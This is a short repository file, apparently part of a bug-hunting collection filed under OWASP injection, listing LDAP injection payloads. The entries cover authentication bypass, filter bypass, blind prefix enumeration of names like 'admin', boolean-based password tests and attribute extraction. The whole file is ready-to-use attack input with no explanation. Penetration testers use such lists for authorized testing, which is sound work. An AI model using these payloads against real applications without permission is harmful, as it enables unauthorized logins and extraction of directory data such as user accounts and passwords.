Files
hunting/OWASP-Top-10/A03-Injection/ldap-injection-payloads.txt
T
2026-01-04 18:24:32 +00:00

40 lines
568 B
Plaintext

# LDAP Injection Payloads
# Basic LDAP injection
*
*(uid=*)
*(cn=*)
*(objectClass=*)
# Authentication bypass
*)(uid=*))(|(uid=*
*)(|(uid=*))
*)(cn=admin)(|(cn=*
admin)(&(uid=*))
# Filter bypass
*)(objectClass=*))(&(objectClass=*
*)(|(password=*))
*)(cn=*)(|(cn=*
# Blind LDAP injection
*)(cn=a*
*)(cn=ad*
*)(cn=adm*
*)(cn=admin*
# Boolean-based
(&(uid=admin)(password=*))
(&(uid=admin)(!(password=wrong)))
(|(uid=admin)(uid=administrator))
# Wildcard usage
uid=*
cn=*
sn=*
mail=*
# Attribute extraction
*)(objectClass=*))(%26(objectClass=*
*)(uid=*))(%26(uid=*